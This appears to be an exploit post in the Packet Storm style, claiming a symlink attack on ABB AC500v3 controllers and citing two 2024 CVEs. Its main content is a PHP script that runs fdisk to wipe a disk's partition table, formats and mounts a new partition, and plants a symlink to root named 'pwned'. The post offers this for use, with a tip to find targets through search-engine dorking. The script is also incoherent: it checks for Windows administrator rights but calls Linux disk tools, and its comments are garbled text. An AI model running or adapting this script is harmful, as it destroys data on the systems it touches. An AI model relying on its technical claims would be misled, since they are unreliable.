============================================================================================================================================= | # Title : ABB AC500v3 3.7.0.569 Exploiting Symlink vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://global.abb/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: Exploiting Symlink on ABB AC500 System Using PHP. (Related : https://packetstorm.news/files/id/188713/ Related CVE numbers: CVE-2024-12429, CVE-2024-12430 ) . [+] Usage : C:\www>php 2.php /dev/sdX [+] PayLoad : <?php // indoushka // abb ac500 symlink exploit // تØÙ‚Ù‚ إذا كان المستخدم قد أدخل معطى (اسم القرص) من سطر الأوامر if ($argc != 2) { echo "Usage: php abb_ac500_symlink.php /dev/sdX\n"; exit(1); } // تØÙ‚Ù‚ إذا كان البرنامج يعمل بصلاØÙŠØ§Øª المسؤول ÙÙŠ ويندوز $isAdmin = (bool) shell_exec('NET SESSION'); if (!$isAdmin) { echo "This script must be run as Administrator.\n"; exit(1); } $disk = $argv[1]; $part = $disk . "1"; $mountPoint = "/mnt/sdcard"; $symLinkTarget = "/"; $symLinkName = "pwned"; // Ù…ØØ§ÙˆÙ„Ø© إلغاء تØÙ…يل الأقراص المتصلة exec("umount {$disk}* 2>/dev/null"); // ØØ°Ù جميع الأقسام Ø§Ù„ØØ§Ù„ية على القرص $fdiskCommands = "o\nw\n"; file_put_contents("/tmp/fdisk_commands.txt", $fdiskCommands); exec("fdisk {$disk} < /tmp/fdisk_commands.txt"); // إنشاء قسم جديد على القرص $fdiskCommands = "n\np\n1\n\n\nw\n"; file_put_contents("/tmp/fdisk_commands.txt", $fdiskCommands); exec("fdisk {$disk} < /tmp/fdisk_commands.txt"); exec("partprobe {$disk}"); // تنسيق القسم باستخدام ext4 exec("mkfs.ext4 -F {$part}"); // إنشاء مجلد للنقطة المثبتة mkdir($mountPoint, 0777, true); // تركيب القسم exec("mount {$part} {$mountPoint}"); // إنشاء رابط رمزي symlink($symLinkTarget, "{$mountPoint}/{$symLinkName}"); // عرض Ù…ØØªÙˆÙŠØ§Øª المجلد بعد إنشاء الرابط الرمزي exec("ls -l {$mountPoint}"); // إلغاء تØÙ…يل القسم exec("umount {$mountPoint}"); echo "Done.\n"; Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================